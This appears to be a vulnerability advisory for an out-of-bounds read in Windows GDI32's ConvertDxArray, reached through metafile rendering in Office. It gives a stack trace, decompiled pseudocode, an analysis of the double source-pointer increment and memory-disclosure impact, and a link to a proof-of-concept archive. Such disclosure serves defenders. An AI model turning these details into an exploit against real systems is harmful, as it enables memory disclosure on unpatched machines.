+1c45e6dc 776442e7 1f210a94 0000001b 00000093 GDI32!MF_ExtTextOut+0x3b4
+1c45ec48 776405dc 1f210a94 0000001b 00000093 GDI32!ExtTextOutInternalA+0x156
+1c45ec74 7764969c 1f210a94 0000001b 00000093 GDI32!ExtTextOutA+0x24
+1c45ed5c 7764e40f 1f210a94 0ab42fc8 0747bc42 GDI32!PlayMetaFileRecord+0x1bc7
+1c45ede0 7764e441 21464dc0 0000000c 00000000 GDI32!CommonEnumMetaFile+0x24d
+1c45edf8 741fb1c0 1f210a94 2a260a92 7764438a GDI32!PlayMetaFile+0x1f
+1c45ee60 741fb65b 2a260a92 43b405d9 46123597 GdiPlus!GetEmfFromWmfData+0x420
+1c45ee84 741fb768 2a260a92 1c45eec8 00000000 GdiPlus!GpMetafile::InitWmf+0xb2
+1c45eea0 741fea9f 2a260a92 1c45eec8 00000000 GdiPlus!GpMetafile::GpMetafile+0x3b
+1c45eef8 741ff642 19a0cd28 1c45efbc 00000000 GdiPlus!GpMetafile::ConvertToEmfPlus+0x79
+1c45ef1c 741d4fc2 19a0cd28 1c45efbc 00000004 GdiPlus!GpMetafile::ConvertToEmfPlus+0x1d
+1c45ef58 6b388b58 19a0cd28 1999ef28 1c45efbc GdiPlus!GdipConvertToEmfPlus+0xbf
+1c45efd4 6b36f2f4 19a0cd28 00000000 1fd76f56 gfx!Ordinal841+0x12250
+1c45f004 678980c2 1c45f07c 1c45f024 1fd75519 gfx!Ordinal745+0x34
+1c45f090 67897d68 1c45f0e8 07430f28 21408fe0 oart!Ordinal7931+0x6d0
+1c45f104 677e340d 07430f28 1c45f124 67805b69 oart!Ordinal7931+0x376
+1c45f110 67805b69 1c45f2c8 1c45f1b0 6b24cceb oart!Ordinal3235+0x14a
+
+The function GDI32!ConvertDxArray is called with codepage 936 (ANSI/OEM Simplified Chinese [PRC, Singapore]; Chinese Simplified [GB2312]) a length of 4 (DWORDs) and a source contents containing 0x00000010 0x00000000 0x00000010 0x00000000. There are two paths in this function, one that operates on 4 byte boundaries and one that operates on 8 byte boundaries depending on the last argument where true indicates an 8-byte boundary and false indicates a 4-byte boundary. Both paths have the same issue. Pseudocode for one path in the function is:
+
+...
+ else if ( (unsigned int)current < result )
+ {
+ cur_dest = (unsigned int *)dest;
+ cur_src = (unsigned int *)src;
+ do
+ {
+ dbcs_ret = IsDBCSLeadByteEx(CodePage, *current++);
+ dbcs_flag = dbcs_ret == 0;
+ tmp = *cur_src;
+ *cur_dest = tmp;
+ if ( !dbcs_flag )
+ {
+ ++cur_src;
+ tmp = *cur_src; // crash here
+ ++current;
+ *cur_dest += tmp;
+ }
+ ++cur_src;
+ ++cur_dest;
+ }
+ while ( (unsigned int)current < end );
+ }
+
+The issue here is that when dbcs_flag is false the 4 byte boundary version can actually process 8 bytes of the source buffer (cur_src is incremented twice) and the 8 byte version is capable of processing 16 bytes per iteration. The length checks in this function do not verify this behavior to be in bounds. However, the most likely exploitation scenario will be a memory disclosure because cur_dest is not written to out of bounds. The value in tmp is instead added to the contents of cur_dest.
+
+
+Proof of Concept:
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/41419.zip